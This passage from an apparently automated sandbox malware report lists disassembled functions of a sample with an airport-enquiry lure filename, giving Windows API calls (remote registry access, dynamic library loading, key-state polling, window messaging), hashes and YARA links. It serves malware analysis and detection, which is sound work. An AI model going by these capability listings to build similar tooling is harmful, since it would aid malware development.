            • Opcode Fuzzy Hash: 4632f397794e1fbc1051efa5e38caa39ce14e141e2aeb25ce1cf9d0e9c3baca2
            • Instruction Fuzzy Hash: 30215E74604349ABDF209F7ADC05B9A7BA8AF54720F204B19FCB5D72D0E7B09A509B60
            Function 00CE710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
            Download Yara Rule
            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 00CE712B
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE715D
            • GetStdHandle.KERNEL32(000000F6), ref: 00CE716E
            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CE71A8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHandle$FilePipe
            • String ID: nul
            • API String ID: 4209266947-2873401336
            • Opcode ID: 8c7ee4cd0b81ab0efb0ef8146a16b637285c3e9d2eaef3b2c238285d20375edd
            • Instruction ID: cb9dc1244b7ea9da50a84787b529145a23a001fd872f72442659d955ac92c027
            • Opcode Fuzzy Hash: 8c7ee4cd0b81ab0efb0ef8146a16b637285c3e9d2eaef3b2c238285d20375edd
            • Instruction Fuzzy Hash: 0A21AF75604385ABDB209F6A9C04BAEB7A8AF55730F200B19FCF9D32D0D77099418B61
            Function 00CEAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEAEBF
            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CEAF13
            • __swprintf.LIBCMT ref: 00CEAF2C
            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D0F910), ref: 00CEAF6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$InformationVolume__swprintf
            • String ID: %lu
            • API String ID: 3164766367-685833217
            • Opcode ID: 6593023c2e85845d7f7d3a201041d74445b891d7fbf8434a01eadfc88fefe147
            • Instruction ID: f571dc870142dc6222cc2642fa789d519ac218a205d07cf2a757aff7968daf32
            • Opcode Fuzzy Hash: 6593023c2e85845d7f7d3a201041d74445b891d7fbf8434a01eadfc88fefe147
            • Instruction Fuzzy Hash: 57217131A00249AFCB10EF65CC85EEE7BB8EF89704B144069F909EB351DB71EA45DB61
            Function 00CDA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00CDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CDA399
              • Part of subcall function 00CDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDA3AC
              • Part of subcall function 00CDA37C: GetCurrentThreadId.KERNEL32 ref: 00CDA3B3
              • Part of subcall function 00CDA37C: AttachThreadInput.USER32(00000000), ref: 00CDA3BA
            • GetFocus.USER32 ref: 00CDA554
              • Part of subcall function 00CDA3C5: GetParent.USER32(?), ref: 00CDA3D3
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDA59D
            • EnumChildWindows.USER32(?,00CDA615), ref: 00CDA5C5
            • __swprintf.LIBCMT ref: 00CDA5DF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
            • String ID: %s%d
            • API String ID: 1941087503-1110647743
            • Opcode ID: 1d7332562cd0ffe09f49aae1aeb1b19e2a98d3f15518ba2f7aeb206110216881
            • Instruction ID: eaf2c21d25aed5db139002e9f437ebd22391e96d5f104510ab5036014f1eb0ef
            • Opcode Fuzzy Hash: 1d7332562cd0ffe09f49aae1aeb1b19e2a98d3f15518ba2f7aeb206110216881
            • Instruction Fuzzy Hash: D211B471200309BBDF217F64DC85FEA3779AF48700F14407ABA0CAA292DA7499469B75
            Function 00CE2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00CE2048
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpper
            • String ID: APPEND$EXISTS$KEYS$REMOVE
            • API String ID: 3964851224-769500911
            • Opcode ID: 92caefb87a985cb506d72dadf35c3ebddb56f133e9bf3b299c65ef49eed3d769
            • Instruction ID: ce0776064a34d249c48239a4da7f9816074d948a12cc7223d449546eaa94972c
            • Opcode Fuzzy Hash: 92caefb87a985cb506d72dadf35c3ebddb56f133e9bf3b299c65ef49eed3d769
            • Instruction Fuzzy Hash: 4E115E7190020A8FCF00EFA5D8815FEB7B4FF56308F608469D855A7391EB325A06EB50
            Function 00CFEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
            Download Yara Rule
            APIs
            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CFEF1B
            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CFEF4B
            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CFF07E
            • CloseHandle.KERNEL32(?), ref: 00CFF0FF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$CloseCountersHandleInfoMemoryOpen
            • String ID:
            • API String ID: 2364364464-0
            • Opcode ID: 0dc927f0c7d72ebddd0b3337f31b528536657b50ca9f1e71b3e1b523a9877929
            • Instruction ID: 3711181badee5e5a947a51c64cbc0e9e312ccdcbc6c84eed1a0f2dbee6050182
            • Opcode Fuzzy Hash: 0dc927f0c7d72ebddd0b3337f31b528536657b50ca9f1e71b3e1b523a9877929
            • Instruction Fuzzy Hash: B28171716043009FD724EF24C886F6AB7E5EF48724F14882DF69ADB392DB70AD019B56
            Function 00D002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00388
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D003C7
            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D0040E
            • RegCloseKey.ADVAPI32(?,?), ref: 00D0043A
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00447
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
            • String ID:
            • API String ID: 3440857362-0
            • Opcode ID: fbc6daca522fd21076f7b2dc263e6fa561000927646f007c6a3fe943b5b3c37f
            • Instruction ID: ecf5838a82d5ee2f67082e75d3cd551dcc17f0159114e50a4623bc09cd76100e
            • Opcode Fuzzy Hash: fbc6daca522fd21076f7b2dc263e6fa561000927646f007c6a3fe943b5b3c37f
            • Instruction Fuzzy Hash: 36515B31208204AFD714EF64C881F6EBBE8FF84708F54892DF59987291DB30E904DB66
            Function 00CFDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CFDC3B
            • GetProcAddress.KERNEL32(00000000,?), ref: 00CFDCBE
            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CFDCDA
            • GetProcAddress.KERNEL32(00000000,?), ref: 00CFDD1B
            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CFDD35
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
            • String ID:
            • API String ID: 327935632-0
            • Opcode ID: 2d11f04f7de3e42e87b38830e1b32b0a705580e81ec46153da67a7ee1e75903f
            • Instruction ID: 1b92f018b04107340846c4a53d5734f7334dd9a14d075fb82d2ecf289416825c
            • Opcode Fuzzy Hash: 2d11f04f7de3e42e87b38830e1b32b0a705580e81ec46153da67a7ee1e75903f
            • Instruction Fuzzy Hash: BC512935A00209DFCB00EF68C4849ADB7F5FF59314B188069E91AAB351DB71EE45DF92
            Function 00CEE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
            Download Yara Rule
            APIs
            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CEE88A
            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CEE8B3
            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CEE8F2
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CEE917
            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CEE91F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
            • String ID:
            • API String ID: 1389676194-0
            • Opcode ID: 2074ec2ed4fbab0b59575ecbabe7b1fff286a59573e3030e85210ca768966e4f
            • Instruction ID: 70900c559c78c4e71cf4805e6b916f047adfe64633981dc44dfe83ca526b4d2b
            • Opcode Fuzzy Hash: 2074ec2ed4fbab0b59575ecbabe7b1fff286a59573e3030e85210ca768966e4f
            • Instruction Fuzzy Hash: F4514F35A00205DFCF15EF65C981AADBBF5FF08314B188099E849AB362CB31ED11DB54
            Function 00D0A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6ccb751ae154091b5ba76271d83d628f24fdc3187ac00269f1418b9c53535eae
            • Instruction ID: b30f3c49ef1e60c45b74683bcc5133b1ac1274922d95aaf7db00be4cbbf439e9
            • Opcode Fuzzy Hash: 6ccb751ae154091b5ba76271d83d628f24fdc3187ac00269f1418b9c53535eae
            • Instruction Fuzzy Hash: 89419039900314ABD720DFACCC48FA9BBA4EB09310F594265E95EE72E1D770ED41DA72
            Function 00C82344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
            Download Yara Rule
            APIs
            • GetCursorPos.USER32(?), ref: 00C82357
            • ScreenToClient.USER32(00D467B0,?), ref: 00C82374
            • GetAsyncKeyState.USER32(00000001), ref: 00C82399
            • GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AsyncState$ClientCursorScreen
            • String ID:
            • API String ID: 4210589936-0
            • Opcode ID: 9189bcd641a09085cff70d480de51e0393307899525352e491dddd6918cbe008
            • Instruction ID: 2d885c471523c7cda45561f0f8ea17b8ef61575a2fae8cf95a26751d7261a4d9
            • Opcode Fuzzy Hash: 9189bcd641a09085cff70d480de51e0393307899525352e491dddd6918cbe008
            • Instruction Fuzzy Hash: 16418275904215FBDF159F69C888AEDBB74FF05324F20431AF838922A0C735AE54DBA5
            Function 00CD6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
            Download Yara Rule
            APIs
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CD695D
            • TranslateAcceleratorW.USER32(?,?,?), ref: 00CD69A9
            • TranslateMessage.USER32(?), ref: 00CD69D2
            • DispatchMessageW.USER32(?), ref: 00CD69DC
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CD69EB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message$PeekTranslate$AcceleratorDispatch
            • String ID:
            • API String ID: 2108273632-0
            • Opcode ID: c5b452bc62abaa529f5bb35611628702212b74938b9a84f67fb26d045214c57a
            • Instruction ID: 02ae97eb9eedfbd3966d49913bd1d37bc5080c4ab599a8a150d18c91324243df
            • Opcode Fuzzy Hash: c5b452bc62abaa529f5bb35611628702212b74938b9a84f67fb26d045214c57a
            • Instruction Fuzzy Hash: 2D31E371900346ABDB20CF75CC84BBA7BA8AB03304F10416BE67AD37A1D775D989D7A1
            Function 00CD8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
            Download Yara Rule
            APIs
            • GetWindowRect.USER32(?,?), ref: 00CD8F12
            • PostMessageW.USER32(?,00000201,00000001), ref: 00CD8FBC
            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CD8FC4
            • PostMessageW.USER32(?,00000202,00000000), ref: 00CD8FD2
            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CD8FDA
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePostSleep$RectWindow
            • String ID:
            • API String ID: 3382505437-0
            • Opcode ID: c3f96cedfcb1990d6346ccf330c13e58ef36234205a738364e6ee73c93cff59c
            • Instruction ID: 8846dc7789e80d7ce61af5ae5dfc2ecbf6b60e261d7f1e46650011873f736f73
            • Opcode Fuzzy Hash: c3f96cedfcb1990d6346ccf330c13e58ef36234205a738364e6ee73c93cff59c
            • Instruction Fuzzy Hash: B831C271500219EFDF14CFA8DD4CBAE7BB6EB04315F10422AFA25E62D0C7B09A14DB91
            Function 00CDB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • IsWindowVisible.USER32(?), ref: 00CDB6C7
            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CDB6E4
            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CDB71C
            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CDB742
            • _wcsstr.LIBCMT ref: 00CDB74C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
            • String ID:
            • API String ID: 3902887630-0
            • Opcode ID: 4de2a3b998160ed68995ee357fb789a7e780c3aa0e7791c53fe5d6257ed70ecc
            • Instruction ID: 5b65027053346607bcfcff7129c8c9f00d08f0e9f8169d04de1e7c13020c2ffa
            • Opcode Fuzzy Hash: 4de2a3b998160ed68995ee357fb789a7e780c3aa0e7791c53fe5d6257ed70ecc
            • Instruction Fuzzy Hash: FE210731204205FBEB255B399C49E7B7B98DF4A760F12402AFD09CA3A1EB61CD419270
            Function 00D0B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0B44C
            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00D0B471
            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D0B489
            • GetSystemMetrics.USER32(00000004), ref: 00D0B4B2
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CF1184,00000000), ref: 00D0B4D0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Long$MetricsSystem
            • String ID:
            • API String ID: 2294984445-0
            • Opcode ID: e22e707b8631a8560b80dfc6e56abdec9d26f281b9bb63177bf40238bf2420bd
            • Instruction ID: 78964444b85bb58bae4b6da2576b41c2a0ab51466a7c18dc389413a041c76e38
            • Opcode Fuzzy Hash: e22e707b8631a8560b80dfc6e56abdec9d26f281b9bb63177bf40238bf2420bd
            • Instruction Fuzzy Hash: 23218271914215AFCB209F38CC08B6937A4FB05738F254726F92AD36E1E730D910DB60
            Function 00CD97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CD9802
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD9834
            • __itow.LIBCMT ref: 00CD984C
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD9874
            • __itow.LIBCMT ref: 00CD9885
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$__itow$_memmove
            • String ID:
            • API String ID: 2983881199-0
            • Opcode ID: 4de1d3a090988673dabbc79628268a7707c644f1be0fef618670e9cf053b254f
            • Instruction ID: fcd4ca3139fed2db33472c97d81b80dc96e1beb95738c4ac14ac69778a8ab307
            • Opcode Fuzzy Hash: 4de1d3a090988673dabbc79628268a7707c644f1be0fef618670e9cf053b254f
            • Instruction Fuzzy Hash: F021CB35B00304AFDB10AB658C86EAE7BA9EF4AB14F14002AFA05D7391D671DD45E7A1
            Function 00C812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
            Download Yara Rule
            APIs
            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
            • SelectObject.GDI32(?,00000000), ref: 00C8135C
            • BeginPath.GDI32(?), ref: 00C81373
            • SelectObject.GDI32(?,00000000), ref: 00C8139C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
